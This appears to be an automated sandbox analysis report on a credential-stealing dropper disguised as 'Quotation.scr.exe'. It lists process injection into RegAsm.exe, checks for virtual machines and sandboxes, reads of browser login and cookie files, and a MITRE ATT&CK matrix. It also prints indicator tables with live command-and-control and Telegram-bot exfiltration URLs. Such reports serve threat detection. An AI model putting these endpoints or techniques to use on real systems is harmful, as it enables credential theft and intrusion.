                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeModel.cs .Net Code: TryDeserializeList
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, ListDecorator.cs .Net Code: Read
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeSerializer.cs .Net Code: CreateInstance
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateInstance
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeSerializer.cs .Net Code: EmitCreateIfNull
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                    Source: Yara match File source: 0.2.Quotation.scr.exe.5790000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000000.00000002.2254071383.0000000005790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Code function: 0_2_0578A411 push eax; retf 0_2_0578A414
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Code function: 0_2_0586BBC0 push eax; retf 0_2_0586BBCD
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Code function: 0_2_058D1D9B push E8FFFFFFh; retf 0_2_058D1DA1
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Code function: 0_2_058D7021 push cs; iretd 0_2_058D7027
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Code function: 0_2_059336C7 push es; retf 0_2_059336CC
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Code function: 0_2_05B831B0 pushad ; iretd 0_2_05B831B3
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Code function: 0_2_05B8088C push E8000001h; retf 0_2_05B80891
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Code function: 0_2_05B85735 push cs; retf 0000h 0_2_05B85740
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_012DB570 push dword ptr [ebp+ebx-75h]; iretd 2_2_012DB53D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_012D891E pushad ; iretd 2_2_012D891F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_012D8DDF push esp; iretd 2_2_012D8DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_012D8C2F pushfd ; iretd 2_2_012D8C30
                    Source: 0.2.Quotation.scr.exe.5590000.5.raw.unpack, j1bgXlDUmHmGlK1NBYE.cs High entropy of concatenated method names: 'h9HDd96Wny', 'fsjDyNHK2tCrwAeP9x4', 'pjFY98Htqf1gQslItLF', 'peHcXZHG3bYOHBxDsKT', 'J2Wc56HLHNZlZSebJJl', 'dOSrw4HIgK03o09w7fb', 'cOgA20HTgH0paud1qRc', 'DRhjK9HxO20DARA6lmU'
                    Source: 0.2.Quotation.scr.exe.5590000.5.raw.unpack, NoxXayDsnjOk43FfmnZ.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'ykYDYLGTgV', 'NtProtectVirtualMemory', 'E6HC7OHHvXlvbXa3iGt', 'pgNU8HHiX9P0FOekBxb', 'D5T1GdHa0rFuLt37KBN', 'SvLMhoH8WNNyys5q8NR'
                    Source: C:\Users\user\Desktop\Quotation.scr.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match -- File source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Memory allocated: 2240000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Memory allocated: 23E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Memory allocated: 43E0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Memory allocated: 12D0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Memory allocated: 2D10000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Memory allocated: 1410000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Thread delayed, 51 calls in order, delay time: 922337203685477; 600000, 599875, 599765, 599656, 599546, 599437, 599324, 599203, 599093, 598984, 598875, 598765, 598656, 598546, 598437, 598328, 598218, 598109, 598000, 597890, 597781, 597672, 597562, 597453, 597342, 597218, 597108, 596984, 596859, 596750, 596640, 596531, 596421, 596312, 596203, 596093, 595984, 595859, 595750, 595640, 595531, 595421, 595312, 595203, 595093, 594984, 594859, 594734, 594625, 594515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Window / User API: threadDelayed 7973
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Window / User API: threadDelayed 1884
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6080 -- Thread sleep time, 51 calls in order, each >= -30000s: -22136092888451448s, -600000s, -599875s, -599765s, -599656s, -599546s, -599437s, -599324s, -599203s, -599093s, -598984s, -598875s, -598765s, -598656s, -598546s, -598437s, -598328s, -598218s, -598109s, -598000s, -597890s, -597781s, -597672s, -597562s, -597453s, -597342s, -597218s, -597108s, -596984s, -596859s, -596750s, -596640s, -596531s, -596421s, -596312s, -596203s, -596093s, -595984s, -595859s, -595750s, -595640s, -595531s, -595421s, -595312s, -595203s, -595093s, -594984s, -594859s, -594734s, -594625s, -594515s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5664 -- Thread sleep count: 7973 > 30; 1884 > 30
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: discord.comVMware20,11696487552f
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: global block list test formVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: tasks.office.comVMware20,11696487552o
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: AMC password management pageVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: interactivebrokers.comVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: dev.azure.comVMware20,11696487552j
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: outlook.office365.comVMware20,11696487552t
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Quotation.scr.exe, 00000000.00000002.2245312531.00000000005C5000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                    Source: Quotation.scr.exe, 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: model0Microsoft|VMWare|Virtual
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: outlook.office.comVMware20,11696487552s
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                    Source: RegAsm.exe, 00000002.00000002.4572806389.00000000010AB000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{P+"I
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                    Source: RegAsm.exe, 00000002.00000002.4576678268.0000000003FCD000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Process token adjusted: Debug (2 occurrences)
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 444000
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 446000
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A37008
                    Source: C:\Users\user\Desktop\Quotation.scr.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\Quotation.scr.exeQueries volume information: C:\Users\user\Desktop\Quotation.scr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

Source: Yara match -- File source: 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
Source: Yara match -- File source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR
Source: Yara match -- File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
Source: Yara match -- File source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe -- Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match -- File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.2245862196.0000000002903000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
Source: Yara match -- File source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match -- File source: 00000002.00000002.4574409470.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
Source: Yara match -- File source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR
Source: Yara match -- File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.34c8c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.34c8c50.2.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match -- File source: 00000000.00000002.2252517628.0000000003569000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: 00000002.00000002.4572109366.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match -- File source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
Source: Yara match -- File source: Process Memory Space: RegAsm.exe PID: 2432, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic column; the numbers are reproduced exactly as the matrix displayed them in front of matched techniques, and techniques without a number are the matrix's unmatched cells)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Scheduled Task/Job; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 Scheduled Task/Job; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 311 Process Injection; 1 Scheduled Task/Job; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 311 Process Injection; 1 Deobfuscate/Decode Files or Information; 21 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 11 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 13 System Information Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Web Service; 11 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label | Link
Quotation.scr.exe | 29% | Virustotal | - | Browse
Quotation.scr.exe | 32% | ReversingLabs | Win32.Dropper.Generic | -
Quotation.scr.exe | 100% | Avira | HEUR/AGEN.1308518 | -
Quotation.scr.exe | 100% | Joe Sandbox ML | - | -
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
eg-mart.com | 0% | Virustotal | - | Browse
reallyfreegeoip.org | 0% | Virustotal | - | Browse
api.telegram.org | 2% | Virustotal | - | Browse
checkip.dyndns.com | 0% | Virustotal | - | Browse
checkip.dyndns.org | 0% | Virustotal | - | Browse
Source | Detection | Scanner | Label / Link
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
http://varders.kozow.com:8081 | 0% | URL Reputation | safe
http://aborters.duckdns.org:8081 | 100% | URL Reputation | malware
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | URL Reputation | safe
http://anotherarmy.dns.army:8081 | 100% | URL Reputation | malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded | 0% | URL Reputation | safe
https://eg-mart.com | 0% | Avira URL Cloud | safe
https://stackoverflow.com/q/14436606/23354 | 0% | Avira URL Cloud | safe
https://www.office.com/ | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
https://github.com/mgravell/protobuf-netJ | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
https://www.office.com/ | 0% | Virustotal | Browse
https://eg-mart.com | 1% | Virustotal | Browse
https://api.telegram.org | 1% | Virustotal | Browse
https://github.com/mgravell/protobuf-netJ | 0% | Virustotal | Browse
https://www.office.com/lB | 0% | Avira URL Cloud | safe
https://github.com/mgravell/protobuf-net | 0% | Avira URL Cloud | safe
http://checkip.dyndns.org | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text= | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal | Browse
https://chrome.google.com/webstore?hl=en | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 2% | Virustotal | Browse
https://www.office.com/lB | 0% | Virustotal | Browse
http://checkip.dyndns.org | 0% | Virustotal | Browse
https://github.com/mgravell/protobuf-net | 0% | Virustotal | Browse
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:618321%0D%0ADate%20a | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot/sendMessage?chat_id=&text= | 0% | Virustotal | Browse
http://checkip.dyndns.org/ | 0% | Avira URL Cloud | safe
https://chrome.google.com/webstore?hl=en | 0% | Virustotal | Browse
https://github.com/mgravell/protobuf-neti | 0% | Avira URL Cloud | safe
https://stackoverflow.com/q/14436606/23354 | 0% | Virustotal | Browse
